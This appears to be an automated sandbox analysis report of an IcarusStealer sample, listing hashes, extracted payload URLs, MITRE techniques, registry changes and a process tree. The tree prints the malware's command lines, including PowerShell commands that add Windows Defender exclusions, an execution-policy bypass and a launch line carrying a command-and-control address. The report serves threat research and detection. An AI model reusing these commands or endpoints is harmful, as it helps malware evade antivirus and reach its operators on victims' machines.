icarusstealer | 5422c44ddaea8b411bd457cd24c33c1c1fa8eed02dbdb35338da412f2be1dd33

Analysis

max time kernel
55s
max time network
150s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
08/03/2024, 21:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Lol.exe
Size

494KB
MD5

02d13710a5a788759319df4d64b95c17
SHA1

166121845fb2f40cc9febc35dea432696e388bec
SHA256

5422c44ddaea8b411bd457cd24c33c1c1fa8eed02dbdb35338da412f2be1dd33
SHA512

0a0a9c7ef30d0d3e71141684e796cfc78eb9d4689e37ae6d66123dfdd8a12df55dd424c47cd1d75068c6b8ff16512da2d607b69a6bc6cbcfba01b8063311171c
SSDEEP

12288:zhGwluLut6N6LqQzJqkKAulc84bYBbuB1t4cWWzDKuVAccIpGNJ+QY:VBZ6N6LqQzJqk/

Score

10^/10

icarusstealer persistence stealer

Malware Config

Extracted

Family

icarusstealer

Attributes

payload_url
https://blackhatsec.org/add.jpg

https://blackhatsec.org/remove.jpg

Signatures

IcarusStealer
Icarus is a modular stealer written in C# First adverts in July 2022.
stealer icarusstealer

Modifies Installed Components in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe

Executes dropped EXE 1 IoCs

pid	Process
2884	SMSHoists.exe

Loads dropped DLL 1 IoCs

pid	Process
2152	cmd.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
4	ipinfo.io

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2104 set thread context of 3052	2104	Lol.exe	30

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Toolbar	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1"	explorer.exe

Modifies registry class 5 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe

Suspicious behavior: EnumeratesProcesses 45 IoCs

pid	Process
240	powershell.exe
2960	powershell.exe
1652	powershell.exe
3052	cvtres.exe
2884	SMSHoists.exe
2884	SMSHoists.exe
2884	SMSHoists.exe
2884	SMSHoists.exe
2884	SMSHoists.exe
2884	SMSHoists.exe
2884	SMSHoists.exe
2884	SMSHoists.exe
2884	SMSHoists.exe
2884	SMSHoists.exe
2884	SMSHoists.exe
2848	chrome.exe
2848	chrome.exe
2884	SMSHoists.exe
2884	SMSHoists.exe
2884	SMSHoists.exe
2884	SMSHoists.exe
2884	SMSHoists.exe
2884	SMSHoists.exe
2884	SMSHoists.exe
2884	SMSHoists.exe
2884	SMSHoists.exe
2884	SMSHoists.exe
2884	SMSHoists.exe
2884	SMSHoists.exe
2884	SMSHoists.exe
2884	SMSHoists.exe
2884	SMSHoists.exe
2884	SMSHoists.exe
2884	SMSHoists.exe
2884	SMSHoists.exe
2884	SMSHoists.exe
2884	SMSHoists.exe
2884	SMSHoists.exe
2884	SMSHoists.exe
2884	SMSHoists.exe
2884	SMSHoists.exe
2884	SMSHoists.exe
2884	SMSHoists.exe
2884	SMSHoists.exe
2884	SMSHoists.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2064	explorer.exe

Suspicious use of AdjustPrivilegeToken 43 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2064	explorer.exe
Token: SeShutdownPrivilege	2064	explorer.exe
Token: SeShutdownPrivilege	2064	explorer.exe
Token: SeShutdownPrivilege	2064	explorer.exe
Token: SeShutdownPrivilege	2064	explorer.exe
Token: SeShutdownPrivilege	2064	explorer.exe
Token: SeShutdownPrivilege	2064	explorer.exe
Token: SeShutdownPrivilege	2064	explorer.exe
Token: SeDebugPrivilege	3052	cvtres.exe
Token: SeDebugPrivilege	240	powershell.exe
Token: SeDebugPrivilege	2960	powershell.exe
Token: SeShutdownPrivilege	2064	explorer.exe
Token: SeShutdownPrivilege	2064	explorer.exe
Token: SeDebugPrivilege	1652	powershell.exe
Token: SeDebugPrivilege	2884	SMSHoists.exe
Token: SeShutdownPrivilege	2848	chrome.exe
Token: SeShutdownPrivilege	2848	chrome.exe
Token: SeShutdownPrivilege	2848	chrome.exe
Token: SeShutdownPrivilege	2848	chrome.exe
Token: SeShutdownPrivilege	2848	chrome.exe
Token: SeShutdownPrivilege	2848	chrome.exe
Token: SeShutdownPrivilege	2848	chrome.exe
Token: SeShutdownPrivilege	2848	chrome.exe
Token: SeShutdownPrivilege	2848	chrome.exe
Token: SeShutdownPrivilege	2848	chrome.exe
Token: SeShutdownPrivilege	2848	chrome.exe
Token: SeShutdownPrivilege	2848	chrome.exe
Token: SeShutdownPrivilege	2848	chrome.exe
Token: SeShutdownPrivilege	2848	chrome.exe
Token: SeShutdownPrivilege	2848	chrome.exe
Token: SeShutdownPrivilege	2848	chrome.exe
Token: SeShutdownPrivilege	2848	chrome.exe
Token: SeShutdownPrivilege	2848	chrome.exe
Token: SeShutdownPrivilege	2848	chrome.exe
Token: SeShutdownPrivilege	2848	chrome.exe
Token: SeShutdownPrivilege	2848	chrome.exe
Token: SeShutdownPrivilege	2848	chrome.exe
Token: SeShutdownPrivilege	2848	chrome.exe
Token: SeShutdownPrivilege	2848	chrome.exe
Token: SeShutdownPrivilege	2848	chrome.exe
Token: SeShutdownPrivilege	2848	chrome.exe
Token: SeShutdownPrivilege	2848	chrome.exe
Token: SeShutdownPrivilege	2848	chrome.exe

Suspicious use of FindShellTrayWindow 60 IoCs

pid	Process
2064	explorer.exe
2064	explorer.exe
2064	explorer.exe
2064	explorer.exe
2064	explorer.exe
2064	explorer.exe
2064	explorer.exe
2064	explorer.exe
2064	explorer.exe
2064	explorer.exe
2064	explorer.exe
2064	explorer.exe
2064	explorer.exe
2064	explorer.exe
2064	explorer.exe
2064	explorer.exe
2064	explorer.exe
2064	explorer.exe
2064	explorer.exe
2064	explorer.exe
2064	explorer.exe
2064	explorer.exe
2064	explorer.exe
2064	explorer.exe
2064	explorer.exe
2064	explorer.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe

Suspicious use of SendNotifyMessage 49 IoCs

pid	Process
2064	explorer.exe
2064	explorer.exe
2064	explorer.exe
2064	explorer.exe
2064	explorer.exe
2064	explorer.exe
2064	explorer.exe
2064	explorer.exe
2064	explorer.exe
2064	explorer.exe
2064	explorer.exe
2064	explorer.exe
2064	explorer.exe
2064	explorer.exe
2064	explorer.exe
2064	explorer.exe
2064	explorer.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe
2848	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2104 wrote to memory of 2064	2104	Lol.exe	29
PID 2104 wrote to memory of 2064	2104	Lol.exe	29
PID 2104 wrote to memory of 2064	2104	Lol.exe	29
PID 2104 wrote to memory of 2064	2104	Lol.exe	29
PID 2104 wrote to memory of 3052	2104	Lol.exe	30
PID 2104 wrote to memory of 3052	2104	Lol.exe	30
PID 2104 wrote to memory of 3052	2104	Lol.exe	30
PID 2104 wrote to memory of 3052	2104	Lol.exe	30
PID 2104 wrote to memory of 3052	2104	Lol.exe	30
PID 2104 wrote to memory of 3052	2104	Lol.exe	30
PID 2104 wrote to memory of 3052	2104	Lol.exe	30
PID 2104 wrote to memory of 3052	2104	Lol.exe	30
PID 2104 wrote to memory of 3052	2104	Lol.exe	30
PID 2064 wrote to memory of 2568	2064	explorer.exe	31
PID 2064 wrote to memory of 2568	2064	explorer.exe	31
PID 2064 wrote to memory of 2568	2064	explorer.exe	31
PID 3052 wrote to memory of 2512	3052	cvtres.exe	32
PID 3052 wrote to memory of 2512	3052	cvtres.exe	32
PID 3052 wrote to memory of 2512	3052	cvtres.exe	32
PID 3052 wrote to memory of 2512	3052	cvtres.exe	32
PID 3052 wrote to memory of 2956	3052	cvtres.exe	34
PID 3052 wrote to memory of 2956	3052	cvtres.exe	34
PID 3052 wrote to memory of 2956	3052	cvtres.exe	34
PID 3052 wrote to memory of 2956	3052	cvtres.exe	34
PID 2956 wrote to memory of 240	2956	cmd.exe	37
PID 2956 wrote to memory of 240	2956	cmd.exe	37
PID 2956 wrote to memory of 240	2956	cmd.exe	37
PID 2956 wrote to memory of 240	2956	cmd.exe	37
PID 2512 wrote to memory of 2960	2512	cmd.exe	36
PID 2512 wrote to memory of 2960	2512	cmd.exe	36
PID 2512 wrote to memory of 2960	2512	cmd.exe	36
PID 2512 wrote to memory of 2960	2512	cmd.exe	36
PID 3052 wrote to memory of 2120	3052	cvtres.exe	39
PID 3052 wrote to memory of 2120	3052	cvtres.exe	39
PID 3052 wrote to memory of 2120	3052	cvtres.exe	39
PID 3052 wrote to memory of 2120	3052	cvtres.exe	39
PID 2120 wrote to memory of 1652	2120	cmd.exe	41
PID 2120 wrote to memory of 1652	2120	cmd.exe	41
PID 2120 wrote to memory of 1652	2120	cmd.exe	41
PID 2120 wrote to memory of 1652	2120	cmd.exe	41
PID 1652 wrote to memory of 2300	1652	powershell.exe	42
PID 1652 wrote to memory of 2300	1652	powershell.exe	42
PID 1652 wrote to memory of 2300	1652	powershell.exe	42
PID 1652 wrote to memory of 2300	1652	powershell.exe	42
PID 2300 wrote to memory of 1144	2300	csc.exe	43
PID 2300 wrote to memory of 1144	2300	csc.exe	43
PID 2300 wrote to memory of 1144	2300	csc.exe	43
PID 2300 wrote to memory of 1144	2300	csc.exe	43
PID 3052 wrote to memory of 2392	3052	cvtres.exe	44
PID 3052 wrote to memory of 2392	3052	cvtres.exe	44
PID 3052 wrote to memory of 2392	3052	cvtres.exe	44
PID 3052 wrote to memory of 2392	3052	cvtres.exe	44
PID 2392 wrote to memory of 740	2392	csc.exe	45
PID 2392 wrote to memory of 740	2392	csc.exe	45
PID 2392 wrote to memory of 740	2392	csc.exe	45
PID 2392 wrote to memory of 740	2392	csc.exe	45
PID 3052 wrote to memory of 2152	3052	cvtres.exe	46
PID 3052 wrote to memory of 2152	3052	cvtres.exe	46
PID 3052 wrote to memory of 2152	3052	cvtres.exe	46
PID 3052 wrote to memory of 2152	3052	cvtres.exe	46
PID 2152 wrote to memory of 2884	2152	cmd.exe	48
PID 2152 wrote to memory of 2884	2152	cmd.exe	48
PID 2152 wrote to memory of 2884	2152	cmd.exe	48
PID 2152 wrote to memory of 2884	2152	cmd.exe	48

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\Lol.exe
"C:\Users\Admin\AppData\Local\Temp\Lol.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2104
- C:\Windows\explorer.exe
  "C:\Windows\explorer.exe"
  2⤵
  - Modifies Installed Components in the registry
  - Modifies Internet Explorer settings
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:2064
- - C:\Windows\system32\ctfmon.exe
    ctfmon.exe
    3⤵
    PID:2568
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe"
    3⤵
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:2848
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef2be9758,0x7fef2be9768,0x7fef2be9778
      4⤵
      PID:2352
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1096 --field-trial-handle=1372,i,3326220726715050817,5926793516944856553,131072 /prefetch:2
      4⤵
      PID:1684
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1504 --field-trial-handle=1372,i,3326220726715050817,5926793516944856553,131072 /prefetch:8
      4⤵
      PID:2304
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1588 --field-trial-handle=1372,i,3326220726715050817,5926793516944856553,131072 /prefetch:8
      4⤵
      PID:1284
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=1508 --field-trial-handle=1372,i,3326220726715050817,5926793516944856553,131072 /prefetch:1
      4⤵
      PID:2932
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2208 --field-trial-handle=1372,i,3326220726715050817,5926793516944856553,131072 /prefetch:1
      4⤵
      PID:3000
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1404 --field-trial-handle=1372,i,3326220726715050817,5926793516944856553,131072 /prefetch:2
      4⤵
      PID:2836
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2912 --field-trial-handle=1372,i,3326220726715050817,5926793516944856553,131072 /prefetch:1
      4⤵
      PID:1636
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3528 --field-trial-handle=1372,i,3326220726715050817,5926793516944856553,131072 /prefetch:8
      4⤵
      PID:1536
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client 147.185.221.17 22817 vUiuCXqqM
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3052
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2512
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2960
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2956
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:240
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c powershell -ep Bypass C:\Users\Admin\AppData\Local\Temp\rescale.ps1
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2120
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -ep Bypass C:\Users\Admin\AppData\Local\Temp\rescale.ps1
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1652
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tk3xlwcg.cmdline"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2300
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7F10.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC7F0F.tmp"
        6⤵
        
        PID:1144
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zn4wkeoe\zn4wkeoe.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2392
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA479.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCEEC8F2D35ADF4DE88FDAC032FE13CFB9.TMP"
      4⤵
      PID:740
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\SMSHoists.exe & exit
    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2152
  - - C:\Users\Admin\AppData\Local\Temp\SMSHoists.exe
      C:\Users\Admin\AppData\Local\Temp\SMSHoists.exe
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2884
- - C:\Windows\SysWOW64\explorer.exe
    "C:\Windows\System32\explorer.exe"
    3⤵
    PID:1904
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe"
    3⤵
    PID:2604

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:2272

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
ad6118e0114b2a0deb1d4717f01be83c

SHA1
07e2df41318278462e1e2ae356309d37938b3f9f

SHA256
1f2c808fdb63876bc6c78bf54a10eaaf57321f720a009c827a5b33d72ec4397a

SHA512
8a935b1b7985a4338a8c65a6b5381dadaeedb089d0e45ef281a40607fa629a4b4ebe65bba5bc345ce68d882b6cff8725f3ef30b09d5aeb7e5f6dbdafcf8c5f2e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
ac98c90f1a59ba3bbec4f002091ac46e

SHA1
e5f890c019ceba4dd54b8060414871f097cd0e92

SHA256
2a2b31d1bbdc47a21ee9ac2f91a702ff069263ec46f2ad2f2d84e579a9725fa3

SHA512
6d356b53d2b2099e289a65869dd125d116d6d331e8cd4858526c668808a4b49c6f22e04b52aed18869161baeb802886ae5e0995973dd0a7db89a36f0efd78923

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000007.dbtmp

Filesize
16B

MD5
18e723571b00fb1694a3bad6c78e4054

SHA1
afcc0ef32d46fe59e0483f9a3c891d3034d12f32

SHA256
8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa

SHA512
43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES7F10.tmp

Filesize
1KB

MD5
5c76c70f9e2bf4fca8e7e1d0948752d1

SHA1
5f3ed12cfa011601eedb8de56cf88746a4ed8786

SHA256
aa6845e9bf97983457a14b399f7c5e0cc41f7d3cdb090b93907bcc218e63c2df

SHA512
e7f30a7c4c9717f10b139087450194425fbb8e382993eebe014035944d5fe1f592590e763d196b8fb079b1363824ebd950c07b2fa179422c3f2f10e3e3fb0040

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESA479.tmp

Filesize
1KB

MD5
d13d87468fc17f61c07c6daad181d202

SHA1
8bc6cb949e5e681915de4367cccc6e5651147929

SHA256
3311a8d968b65943e5221c3114c110cf65bc24adb993d0f0560e384b11836c22

SHA512
465fb56649b318846ff155107053363718260e367a5f9ebc176b13a9f98ed93e88705eb0292f495d7ae52b1b0a612929df9f64da49e0fd2dd926916da90a74bc

Download Submit
C:\Users\Admin\AppData\Local\Temp\SMSHoists.exe

Filesize
4KB

MD5
9b83df4cfccc8a51f411cb8f1d69e0de

SHA1
87e0a21050847031c4b35714374e29b61164c016

SHA256
828e9ec5e13e98fb331c7c5fbd07db76de1b47eee619985484e8ea1032604613

SHA512
32ff7486082484c13dd3a142972b0872c1ce266b4ce7ce82e7cd0729e12ac502a9cc080633c0192f9d5745a2270aef07507ffe3d82140cc658539f5023052886

Download Submit
C:\Users\Admin\AppData\Local\Temp\rescale.ps1

Filesize
584B

MD5
5957e298325fe672f062f0607e67611d

SHA1
39b8b3d28a1c4ef5306e207de9b8b08197c60f79

SHA256
a10479eea5f9d85ac00db77c0e090de2db64cdb163055e7b42fbcb2c97a66898

SHA512
85f5ee03ae0c555ef5d51d2026f2532cc8155b73f75e91ac4ed727abf4578a8b065a3b053ca071ac67eb739cadab1e0e994676c4effa6198b9c536ce5c91e7bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\tk3xlwcg.dll

Filesize
3KB

MD5
4d5d612516d0dfdc2df500336cfb83f3

SHA1
997b33e97227c11722752864f93d4ea7412f24e8

SHA256
2a287e624de01be196d8232543b2b5a2504723d8c927c4953439bef3c3044fe2

SHA512
6ac68a497b65041683d98b606f09a6ecbb3fc9500da7909e7dc4ee101e471484b2054bd762dc28959c2d2ea3140d107daf4a6ad1c1555518277ea6dae6b682e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\tk3xlwcg.pdb

Filesize
7KB

MD5
8d06ebaa530f1ed1ecd3cb090f03ffbb

SHA1
0410c21facad5649b482e1c650e001b83d47091f

SHA256
af21d1636ebdb55c32fc17225f90c35287165f1586ac7d80975e201296988010

SHA512
f3a37f37538f108ae0183ce6adb2e6c30e3b649cf897df83fe33254b3123d5df302cca5c9be4191ca0bcd603ccfc057a74ccac4da1f6624c272e6faa0de7d0eb

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
f053d60cf50024668cfa584474080975

SHA1
dc481edbfec92779639e509cbc2dac6f43174a06

SHA256
8965e4c35ce388f43cd61ba4b1e60e96c9d367207d42eb0971a21b245a333f4c

SHA512
fc5e648e47e674110b278222996a987a5808d7e71ea3a12f931209966b07fa3e9384d1eecca6cc3c17308b9a5ef3a576308000998152e0302eee552db1a88767

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC7F0F.tmp

Filesize
652B

MD5
66eee1a2269e2b46ca06fd1419ece5c1

SHA1
e0d590230bfc5ae50b06d905352002412b9eaa24

SHA256
4fb99a9b8f1a9efa94074ec59cbf7633903429474666d49dac51aa821822a930

SHA512
5533917fa1fc883af00ccbe84a125cda2eb55392406fcf79d0b6af5724ff4f2b08ed53be79c444352e9a21da7a7b053c5ffcf81c51dbd804fbf32c86d5ab130e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCEEC8F2D35ADF4DE88FDAC032FE13CFB9.TMP

Filesize
1KB

MD5
be7ee5c1b32c4c11ab8d5855c0a674a2

SHA1
4b1459595dd3e98efc33d5b17d0d57ab07e181bc

SHA256
